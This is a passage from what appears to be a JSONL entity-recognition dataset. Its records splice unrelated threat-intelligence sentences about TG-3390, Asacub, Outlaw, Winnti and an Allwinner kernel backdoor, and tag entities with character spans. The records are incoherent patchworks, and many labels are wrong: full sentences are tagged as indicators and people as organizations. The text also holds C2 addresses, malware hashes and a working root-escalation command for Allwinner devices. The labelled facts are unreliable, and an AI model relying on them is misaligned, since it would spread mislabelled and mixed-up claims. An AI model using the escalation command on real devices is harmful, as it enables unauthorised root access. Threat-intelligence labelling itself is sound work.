TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter . These routines are indicative of the group \u2019s aim to get quantitative returns through varied cybercriminal profit streams . In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": [{"start": 119, "end": 126, "label": "Organization"}, {"start": 152, "end": 169, "label": "System"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 394, "end": 399, "label": "Malware"}, {"start": 582, "end": 591, "label": "Malware"}]} {"text": "For example , version 9.0.7 ( 2017 ) featured the following set of commands : 2 , 4 , 8 , 11 , 12 , 15 , 16 , 17 , 18 , 19 , 20 . In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system . This was also reinforced by their naming conventions , wherein different versions are simply named after the code iterations , following a specific format regardless of the actual function of the code . But a layered , comprehensive cyber security strategy can do even more to keep your organization safe and secure .", "spans": [{"start": 168, "end": 178, "label": "System"}]} {"text": "After receiving the command , the Trojan attempts to execute it , before informing C & C of the execution status and any data received . CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data . 
Furthermore , based on the group \u2019s use of dated exploits as vectors that companies would have likely addressed with monitoring and regular patching schedules , it appears that they \u2019re going after enterprises who have yet to patch their systems , as well as companies with internet-facing systems with weak to no monitoring of traffic and activities . Last month , NoEscape posted 7 victims on their leak site .", "spans": [{"start": 137, "end": 140, "label": "Organization"}, {"start": 192, "end": 199, "label": "Organization"}, {"start": 668, "end": 676, "label": "Malware"}]} {"text": "The \u201c id \u201d value inside the \u201c data \u201d block is equal to the \u201c timestamp \u201d value of the relevant command : In addition , the Trojan sets itself as the default SMS application and , on receiving a new SMS , forwards the sender \u2019 s number and the message text in base64 format to the cybercriminal : Thus , Asacub can withdraw funds from a bank card linked to the phone by sending SMS for the transfer of funds to another account using the number of the card or mobile phone . When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access . Considering the amount of resources needed to deploy all the necessary patches for an enterprise ( such as quality testing and operations alignment ) , which implies costly downtime for operations and the hesitation to update all systems immediately , Outlaw may find even more targets and victims for their updated botnets every time there is a patch released and waiting to be downloaded . 
While no substantive posts have been made to the FuckNATO channel since late April 2023 , Mandiant anticipates that KillNet and its affiliates will continue to target NATO for the continued future , with the potential for developments in the war in Ukraine to reinvigorate targeting .", "spans": [{"start": 303, "end": 309, "label": "Malware"}, {"start": 856, "end": 862, "label": "Organization"}, {"start": 1112, "end": 1119, "label": "Organization"}, {"start": 1156, "end": 1167, "label": "Organization"}, {"start": 1234, "end": 1252, "label": "Vulnerability"}]} {"text": "Moreover , the Trojan intercepts SMS from the bank that contain one-time passwords and information about the balance of the linked bank card . They then identify the Exchange server and attempt to install the OwaAuth web shell . Save for a few iteration updates , combinations from previous deployments , and using the routines repetitively for every campaign , we found very little changes in the group \u2019s toolkit , which allowed various honeypots across the Eastern European region to detect many of the sent binaries . The NCSC also assesses that it is almost certain Russia was responsible for the subsequent cyber - attack impacting Viasat on 24 February .", "spans": [{"start": 209, "end": 226, "label": "System"}, {"start": 439, "end": 448, "label": "Malware"}, {"start": 526, "end": 530, "label": "Organization"}, {"start": 571, "end": 577, "label": "Organization"}, {"start": 602, "end": 627, "label": "Organization"}, {"start": 638, "end": 644, "label": "Organization"}]} {"text": "Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS and send them to the required number . If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells . 
Meanwhile , the group uses a wide range of IP addresses as input for scanning activities that are grouped by country , allowing them to attack certain regions or areas within particular periods of the year , as previously observed . This could indicate a lack of coordination across different individuals or operational subteams involved in the attack .", "spans": [{"start": 133, "end": 150, "label": "System"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 573, "end": 671, "label": "Indicator"}]} {"text": "What \u2019 s more , the user can not check the balance via mobile banking or change any settings there , because after receiving the command with code 40 , the Trojan prevents the banking app from running on the phone . After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name . We think the group has likely become more enterprising , and learned to take advantage of some details from their previous campaigns to maximize profit opportunities while exerting minimal effort . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": [{"start": 305, "end": 324, "label": "System"}, {"start": 571, "end": 591, "label": "Organization"}, {"start": 703, "end": 721, "label": "System"}, {"start": 722, "end": 751, "label": "Vulnerability"}, {"start": 752, "end": 768, "label": "Vulnerability"}, {"start": 773, "end": 789, "label": "Vulnerability"}]} {"text": "User messages created by the Trojan during installation typically contain grammatical and spelling errors , and use a mixture of Cyrillic and Latin characters . CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access . 
By shaping the attack , the group may be able to create niches in the underground , catering to the specific needs of their customers . Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he \u2019d turned his considerable harassment skills squarely against the company .", "spans": [{"start": 161, "end": 164, "label": "Organization"}, {"start": 438, "end": 451, "label": "Organization"}, {"start": 473, "end": 487, "label": "Organization"}]} {"text": "The Trojan also employs various obfuscation methods : from the simplest , such as string concatenation and renaming of classes and methods , to implementing functions in native code and embedding SO libraries in C/C++ in the APK file , which requires the use of additional tools or dynamic analysis for deobfuscation , since most tools for static analysis of Android apps support only Dalvik bytecode . TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HTTPBrowser or PlugX . Also aware of the existing laws in Europe , they can avoid prosecution in certain countries as long as they avoid attacking them . The high similarity of the fake job recruitment campaigns both groups used to disguise their attacks , and the fact that Lazarus relied on similar versions of Rising Sun in activity tracked in 2017 , point to a connection between the two adversaries .", "spans": [{"start": 403, "end": 410, "label": "Organization"}, {"start": 454, "end": 473, "label": "System"}, {"start": 576, "end": 587, "label": "System"}, {"start": 591, "end": 596, "label": "System"}, {"start": 753, "end": 787, "label": "Organization"}, {"start": 851, "end": 858, "label": "System"}]} {"text": "In some versions of Asacub , strings in the app are encrypted using the same algorithm as data sent to C & C , but with different keys . 
Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain . Collection of results and data from scanning in this manner might be easier to sort ( while allowing them to stay under the radar ) , as compared to getting feedback from zombie bots deployed around the world simultaneously . That Budworm continues to use a known malware SysUpdate , alongside techniques it is known to favor , such as DLL sideloading using an application it has used for this purpose before , indicate that the group is nt too concerned about having this activity associated with it if it is discovered .", "spans": [{"start": 20, "end": 26, "label": "Malware"}, {"start": 508, "end": 515, "label": "Organization"}, {"start": 541, "end": 558, "label": "Malware"}, {"start": 706, "end": 711, "label": "Organization"}]} {"text": "Example of using native code for obfuscation Examples of using string concatenation for obfuscation Example of encrypting strings in the Trojan Asacub distribution geography Asacub is primarily aimed at Russian users : 98 % of infections ( 225,000 ) occur in Russia , since the cybercriminals specifically target clients of a major Russian bank . Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication . We will continue to monitor this hacking group \u2019s activities and their toolkit \u2019s developments . 
Threat actors typically register and use several domains in order to discretely lead their malware to their Command and Control ( C&C ) servers .", "spans": [{"start": 144, "end": 150, "label": "Malware"}, {"start": 174, "end": 180, "label": "Malware"}, {"start": 580, "end": 593, "label": "Organization"}, {"start": 621, "end": 636, "label": "System"}, {"start": 671, "end": 678, "label": "Malware"}, {"start": 688, "end": 723, "label": "System"}]} {"text": "The Trojan also hit users from Ukraine , Turkey , Germany , Belarus , Poland , Armenia , Kazakhstan , the US , and other countries . In 2015 , the SecureWorks\u00ae Counter Threat Unit\u2122 ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU\u2122 analysis suggests is based in the People's Republic of China ( PRC ) . Outlaw \u2019s attack routines may not be new , but it still serves as a reminder for enterprises to update their systems regularly . Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month , while PLAY focused on Switzerland ( 5 ) .", "spans": [{"start": 147, "end": 180, "label": "Organization"}, {"start": 183, "end": 186, "label": "Organization"}, {"start": 263, "end": 270, "label": "Organization"}, {"start": 281, "end": 285, "label": "Organization"}, {"start": 357, "end": 363, "label": "Organization"}, {"start": 533, "end": 538, "label": "Organization"}, {"start": 567, "end": 573, "label": "Organization"}, {"start": 609, "end": 613, "label": "Organization"}, {"start": 625, "end": 636, "label": "Organization"}]} {"text": "Conclusion The case of Asacub shows that mobile malware can function for several years with minimal changes to the distribution scheme . After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used . 
Legacy system users may use their providers \u2019 virtual patches . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": [{"start": 23, "end": 29, "label": "Malware"}, {"start": 206, "end": 214, "label": "System"}, {"start": 219, "end": 222, "label": "System"}, {"start": 268, "end": 275, "label": "Organization"}, {"start": 429, "end": 437, "label": "Organization"}]} {"text": "It is basically SMS spam : many people still follow suspicious links , install software from third-party sources , and give permissions to apps without a second thought . In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) . Users are advised to close unused ports , to secure ports and other internet-facing devices that are regularly open for system administrators \u2019 support . These frameworks are commonly delivered as part of traditional commodity malware , so infection chains can vary widely .", "spans": [{"start": 185, "end": 196, "label": "Organization"}, {"start": 257, "end": 264, "label": "Organization"}, {"start": 275, "end": 278, "label": "Organization"}]} {"text": "At the same time , cybercriminals are reluctant to change the method of communication with the C & C server , since this would require more effort and reap less benefit than modifying the executable file . BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives . Users can also adopt a multilayered security solution that can protect systems from the gateway to the endpoint , actively blocking malicious URLs by employing filtering , behavioral analysis , and custom sandboxing . 
Later in the month , Microsoft officially confirmed that numerous outages of its products were a direct result of DDoS attacks conducted by Anonymous Sudan .", "spans": [{"start": 649, "end": 661, "label": "Organization"}, {"start": 675, "end": 690, "label": "Organization"}]} {"text": "The most significant change in this particular Trojan \u2019 s history was the encryption of data sent between the device and C & C . Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks . Users can consider adopting security solutions that can defend against malicious bot-related activities such as Outlaw \u2019s through a cross-generational blend of threat defense techniques . Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": [{"start": 175, "end": 178, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 258, "end": 278, "label": "Organization"}, {"start": 402, "end": 408, "label": "Organization"}]} {"text": "That said , so as to hinder detection of new versions , the Trojan \u2019 s APK file and the C & C server domains are changed regularly , and the Trojan download links are often one-time-use . this SWC was used to specifically target Turkish . Trend Micro\u2122 XGen\u2122 security provides high-fidelity machine learning that can secure the gateway and endpoints , and protect physical , virtual , and cloud workloads . 
Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality , or without the logical preconditions to trigger their expected function .", "spans": [{"start": 193, "end": 196, "label": "System"}, {"start": 239, "end": 257, "label": "System"}]} {"text": "IOCs C & C IP addresses : 155.133.82.181 155.133.82.240 155.133.82.244 185.234.218.59 195.22.126.160 195.22.126.163 195.22.126.80 195.22.126.81 5.45.73.24 5.45.74.130 IP addresses from which the Trojan was downloaded : 185.174.173.31 185.234.218.59 188.166.156.110 195.22.126.160 195.22.126.80 195.22.126.81 In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world . With technologies that employ web/URL filtering , behavioral analysis , and custom sandboxing , XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities . 
Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": [{"start": 26, "end": 40, "label": "Indicator"}, {"start": 41, "end": 55, "label": "Indicator"}, {"start": 56, "end": 70, "label": "Indicator"}, {"start": 71, "end": 85, "label": "Indicator"}, {"start": 86, "end": 100, "label": "Indicator"}, {"start": 101, "end": 115, "label": "Indicator"}, {"start": 116, "end": 129, "label": "Indicator"}, {"start": 130, "end": 143, "label": "Indicator"}, {"start": 144, "end": 154, "label": "Indicator"}, {"start": 155, "end": 179, "label": "Indicator"}, {"start": 219, "end": 233, "label": "Indicator"}, {"start": 234, "end": 248, "label": "Indicator"}, {"start": 249, "end": 264, "label": "Indicator"}, {"start": 265, "end": 279, "label": "Indicator"}, {"start": 280, "end": 293, "label": "Indicator"}, {"start": 294, "end": 307, "label": "Indicator"}, {"start": 375, "end": 378, "label": "System"}, {"start": 402, "end": 437, "label": "Organization"}, {"start": 452, "end": 461, "label": "Organization"}, {"start": 464, "end": 472, "label": "Organization"}, {"start": 475, "end": 480, "label": "Organization"}, {"start": 483, "end": 493, "label": "Organization"}, {"start": 496, "end": 506, "label": "Organization"}, {"start": 513, "end": 536, "label": "Organization"}, {"start": 652, "end": 656, "label": "System"}, {"start": 795, "end": 800, "label": "Organization"}, {"start": 840, "end": 856, "label": "System"}]} {"text": "195.22.126.82 195.22.126.83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8 In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , 
combat processes , and naval defense systems . A multi-layered connected network defense and complete visibility into all network traffic , in addition to next-generation intrusion prevention system ( NGIPS ) , can help organizations stay a step ahead of threats that could compromise intangible assets . It is foreseeable that an organization such as the Earth Liberation Front ELF may attempt an attack to make a political or social statement while the same organization could be targeted by an adversarial nation state in an attempt to steal intellectual property .", "spans": [{"start": 0, "end": 13, "label": "Indicator"}, {"start": 14, "end": 27, "label": "Indicator"}, {"start": 37, "end": 101, "label": "Indicator"}, {"start": 102, "end": 166, "label": "Indicator"}, {"start": 167, "end": 231, "label": "Indicator"}, {"start": 232, "end": 296, "label": "Indicator"}, {"start": 345, "end": 363, "label": "Organization"}, {"start": 449, "end": 471, "label": "Organization"}, {"start": 474, "end": 490, "label": "Organization"}, {"start": 497, "end": 518, "label": "Organization"}, {"start": 629, "end": 672, "label": "System"}, {"start": 675, "end": 680, "label": "System"}, {"start": 826, "end": 856, "label": "Organization"}, {"start": 971, "end": 995, "label": "Organization"}]} {"text": "c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c this SWC was used to specifically target Turkish goverment . XGen security also powers Trend Micro \u2019s suite of security solutions : Hybrid Cloud Security and User Protection . 
We initially tracked this activity as UNC3810 before merging the cluster with Sandworm .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 265, "end": 268, "label": "System"}, {"start": 321, "end": 325, "label": "Organization"}, {"start": 347, "end": 358, "label": "Organization"}, {"start": 474, "end": 481, "label": "Organization"}, {"start": 514, "end": 522, "label": "Organization"}]} {"text": "31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951 eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101 Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Since that analysis , CTU researchers have observed multiple BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives . Outlaw : 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa Cryptocurrency miner Trojan.SH.MALXMR.UWEJP . In addition , individuals like Hack520 prove that these threat actors are composed of varied individuals who have their own set of expertise .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 255, "end": 258, "label": "System"}, {"start": 281, "end": 284, "label": "Organization"}, {"start": 431, "end": 437, "label": "Organization"}, {"start": 440, "end": 504, "label": "Indicator"}, {"start": 505, "end": 525, "label": "System"}, {"start": 526, "end": 548, "label": "Malware"}, {"start": 582, "end": 589, "label": "Organization"}]} {"text": "Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ? this SWC was used to specifically target Turkish banking . 
Outlaw : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d Shellbot Backdoor.SH.SHELLBOT.AA . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": [{"start": 47, "end": 54, "label": "System"}, {"start": 69, "end": 72, "label": "System"}, {"start": 113, "end": 120, "label": "Organization"}, {"start": 123, "end": 129, "label": "Organization"}, {"start": 132, "end": 196, "label": "Indicator"}, {"start": 197, "end": 205, "label": "Malware"}, {"start": 206, "end": 229, "label": "Malware"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 279, "end": 305, "label": "System"}, {"start": 308, "end": 317, "label": "Organization"}]} {"text": "It is possibly one of the most frequently asked questions on the Internet . this SWC was used to specifically target Turkish academic networks . Outlaw : 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 Tool Trojan.Linux.SSHBRUTE.B . In one exchange on Aug. 16 , 2012 , Ashley Madison \u2019s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": [{"start": 81, "end": 84, "label": "System"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 154, "end": 218, "label": "Indicator"}, {"start": 224, "end": 247, "label": "Malware"}, {"start": 286, "end": 318, "label": "Organization"}]} {"text": "Although it 's not pretty simple to hack Android devices and gadgets , sometimes you just get lucky to find a backdoor access . BRONZE UNION has consistently demonstrated the capability to conduct successful large-scale intrusions against high-profile networks and systems . Outlaw : fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL32 . 
What prompted the data scientist Bullock to reach out were gobs of anti - Semitic diatribes from Harrison , who had taken to labeling Biderman and others \u201c greedy Jew bastards . \u201d", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 275, "end": 281, "label": "Organization"}, {"start": 284, "end": 348, "label": "Indicator"}, {"start": 349, "end": 369, "label": "System"}, {"start": 370, "end": 400, "label": "Malware"}, {"start": 436, "end": 443, "label": "Organization"}, {"start": 500, "end": 508, "label": "Organization"}, {"start": 537, "end": 545, "label": "Organization"}, {"start": 559, "end": 578, "label": "Organization"}]} {"text": "Thanks to Allwinner , a Chinese ARM system-on-a-chip maker , which has recently been caught shipping a version of Linux Kernel with an incredibly simple and easy-to-use built-in backdoor . The threat actors appear to be able to create and leverage multiple SWCs in parallel . Outlaw : 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL64 . The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock , a data scientist who worked with the show \u2019s producers at the Warner Bros. 
production company Wall to Wall Media .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 32, "end": 35, "label": "System"}, {"start": 114, "end": 119, "label": "System"}, {"start": 257, "end": 261, "label": "System"}, {"start": 276, "end": 282, "label": "Organization"}, {"start": 285, "end": 349, "label": "Indicator"}, {"start": 350, "end": 370, "label": "System"}, {"start": 371, "end": 401, "label": "Malware"}, {"start": 465, "end": 480, "label": "Organization"}, {"start": 485, "end": 499, "label": "Organization"}, {"start": 564, "end": 614, "label": "Organization"}]} {"text": "Chinese fabless semiconductor company Allwinner is a leading supplier of application processors that are used in many low-cost Android tablets , ARM-based PCs , set-top boxes , and other electronic devices worldwide . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool . Outlaw : 159.203.141.208 . The hosting services offered at secure[.]66[.]to are in fact hosting services rented to other companies worldwide .", "spans": [{"start": 38, "end": 47, "label": "Organization"}, {"start": 127, "end": 134, "label": "System"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 243, "end": 246, "label": "Organization"}, {"start": 283, "end": 288, "label": "Malware"}, {"start": 366, "end": 372, "label": "Organization"}, {"start": 375, "end": 390, "label": "Indicator"}, {"start": 425, "end": 441, "label": "Indicator"}]} {"text": "Simple Backdoor Exploit to Hack Android Devices All you need to do to gain root access of an affected Android device is\u2026 Send the text \" rootmydevice '' to any undocumented debugging process . BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance . Outlaw : 104.236.192.6 . 
CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 102, "end": 109, "label": "System"}, {"start": 312, "end": 318, "label": "Organization"}, {"start": 321, "end": 334, "label": "Indicator"}, {"start": 337, "end": 368, "label": "Organization"}, {"start": 380, "end": 560, "label": "Indicator"}, {"start": 578, "end": 590, "label": "Organization"}]} {"text": "The local privileges escalation backdoor code for debugging ARM-powered Android devices managed to make its way in shipped firmware after firmware makers wrote their own kernel code underneath a custom Android build for their devices , though the mainstream kernel source is unaffected . BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure . Outlaw : 45.9.148.129:80 Miner pool . Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": [{"start": 60, "end": 71, "label": "System"}, {"start": 72, "end": 79, "label": "System"}, {"start": 202, "end": 209, "label": "System"}, {"start": 457, "end": 463, "label": "Organization"}, {"start": 466, "end": 481, "label": "Indicator"}, {"start": 482, "end": 492, "label": "System"}, {"start": 495, "end": 508, "label": "Organization"}]} {"text": "The backdoor code is believed to have been left by mistake by the authors after completing the debugging process . 
This script relays commands and output between the controller and the system . Outlaw : 45.9.148.125:80 Miner pool . The increasing usage of bring your own device BYOD in hybrid work environments has changed the technology landscape for organizations .", "spans": [{"start": 127, "end": 153, "label": "Malware"}, {"start": 194, "end": 200, "label": "Organization"}, {"start": 203, "end": 218, "label": "Indicator"}, {"start": 219, "end": 229, "label": "System"}, {"start": 256, "end": 365, "label": "Organization"}]} {"text": "For exploiting this issue , any process running with any UID can be converted into root easily by simply using the following command : echo \" rootmydevice '' > /proc/sunxi_debug/sunxi_debug The Linux 3.4-sunxi kernel was originally designed to support the Android operating system on Allwinner ARM for tablets , but later it was used to port Linux to many Allwinner processors on boards like Banana Pi micro-PCs , Orange Pi , and other devices . The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) . Outlaw : http://www.minpop.com/sk12pack/idents.php Command and control . 
The file collected system information , and then invoked a WMI instance in the root\\SecurityCenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": [{"start": 142, "end": 154, "label": "Indicator"}, {"start": 194, "end": 209, "label": "Indicator"}, {"start": 256, "end": 263, "label": "System"}, {"start": 284, "end": 293, "label": "Organization"}, {"start": 294, "end": 297, "label": "System"}, {"start": 342, "end": 347, "label": "System"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 392, "end": 411, "label": "System"}, {"start": 414, "end": 423, "label": "System"}, {"start": 662, "end": 668, "label": "Organization"}, {"start": 671, "end": 712, "label": "Indicator"}, {"start": 713, "end": 732, "label": "System"}]} {"text": "At the forum of the Armbian operating system , a moderator who goes by the name Tkaiser noted that the backdoor code could be remotely exploitable \" if combined with networked services that might allow access to /proc . In 2016 , CTU researchers observed the group using native system . Outlaw : http://www.minpop.com/sk12pack/names.php Command and control . \u201c Who or what is asdfdfsda@asdf.com ? , \u201d Biderman asked , after being sent a list of nine email addresses .", "spans": [{"start": 20, "end": 27, "label": "System"}, {"start": 212, "end": 217, "label": "Indicator"}, {"start": 230, "end": 233, "label": "Organization"}, {"start": 287, "end": 293, "label": "Organization"}, {"start": 296, "end": 336, "label": "Indicator"}, {"start": 337, "end": 356, "label": "System"}, {"start": 376, "end": 394, "label": "Organization"}, {"start": 401, "end": 409, "label": "Organization"}]} {"text": "\" This security hole is currently present in every operating system image for A83T , H3 or H8 devices that rely on kernel 3.4 , he added . In March 2018 we detected an ongoing campaign . Winnti Group targeting universities in Hong Kong . 
Once a system was exploited a unique downloader was dropped onto the victim \u2019s disk , containing a customized micro backdoor written in Assembler .", "spans": [{"start": 79, "end": 83, "label": "System"}, {"start": 86, "end": 88, "label": "System"}, {"start": 92, "end": 94, "label": "System"}, {"start": 116, "end": 126, "label": "System"}, {"start": 188, "end": 200, "label": "Organization"}, {"start": 375, "end": 384, "label": "System"}]} {"text": "This blunder made by the company has been frustrating to many developers . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . In November 2019 , we discovered a new campaign run by the Winnti Group against two Hong Kong universities . The discovery of COSMICENERGY illustrates that the barriers to entry for developing offensive OT capabilities are lowering as actors leverage knowledge from prior attacks to develop new malware .", "spans": [{"start": 261, "end": 273, "label": "Organization"}, {"start": 328, "end": 340, "label": "Malware"}, {"start": 437, "end": 443, "label": "Organization"}]} {"text": "Allwinner has also been less transparent about the backdoor code . As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace . We found a new variant of the ShadowPad backdoor , the group \u2019s flagship backdoor , deployed using a new launcher and embedding numerous modules . This convinced the user it was safe to download files once logged in .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 250, "end": 268, "label": "Malware"}, {"start": 293, "end": 301, "label": "Malware"}]} {"text": "David Manouchehri released the information about the backdoor through its own Github account ( Pastebin ) and then apparently deleted it . we detected an ongoing campaign targeting a national data center . 
The Winnti malware was also found at these universities a few weeks prior to ShadowPad . In addition , individuals like Hack520 prove that these threat actors are composed of varied individuals who have their own set of expertise .", "spans": [{"start": 78, "end": 84, "label": "Organization"}, {"start": 95, "end": 103, "label": "Organization"}, {"start": 206, "end": 224, "label": "Malware"}, {"start": 283, "end": 292, "label": "Malware"}, {"start": 326, "end": 333, "label": "Organization"}]} {"text": "Mobile Malware Evolution : 2013 24 FEB 2014 The mobile malware sector is growing rapidly both technologically and structurally . The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool ( RAT ) . The Winnti Group , active since at least 2012 , is responsible for high-profile supply-chain attacks against the video game and software industries leading to the distribution of trojanized software ( such as CCleaner , ASUS LiveUpdate and multiple video games ) that is then used to compromise more victims . Method , where the code checks one of two values before running encryption logic", "spans": [{"start": 152, "end": 167, "label": "System"}, {"start": 227, "end": 230, "label": "System"}, {"start": 239, "end": 251, "label": "Organization"}, {"start": 418, "end": 437, "label": "Malware"}, {"start": 448, "end": 456, "label": "System"}, {"start": 459, "end": 474, "label": "System"}, {"start": 549, "end": 629, "label": "Indicator"}]} {"text": "It is safe to say that today \u2019 s cybercriminal is no longer a lone hacker but part of a serious business operation . We detected an ongoing campaign targeting a national data center in Central Asia . It is also known for having compromised various targets in the healthcare and education sectors . 
The attackers first attempted to use the LockBit ransomware but when that was blocked , they resorted to 3AM instead .", "spans": [{"start": 307, "end": 316, "label": "Organization"}, {"start": 344, "end": 362, "label": "Malware"}, {"start": 408, "end": 411, "label": "Malware"}]} {"text": "There are various types of actors involved in the mobile malware industry : virus writers , testers , interface designers of both the malicious apps and the web pages they are distributed from , owners of the partner programs that spread the malware , and mobile botnet owners . The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors . ESET researchers recently published a white paper updating our understanding of the arsenal of the Winnti Group , following a blog post documenting a supply-chain attack targeting the videogame industry in Asia . Two examples are Windows Sysinternals SDelete and Active@ Killdisk .", "spans": [{"start": 326, "end": 341, "label": "System"}, {"start": 405, "end": 409, "label": "Organization"}, {"start": 504, "end": 516, "label": "Organization"}, {"start": 635, "end": 655, "label": "System"}, {"start": 656, "end": 663, "label": "System"}, {"start": 668, "end": 684, "label": "System"}]} {"text": "This division of labor among the cybercriminals can also be seen in the behavior of their Trojans . Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) . Additionally , we published a blog post on a new backdoor named skip-2.0 that targets Microsoft SQL Server . 
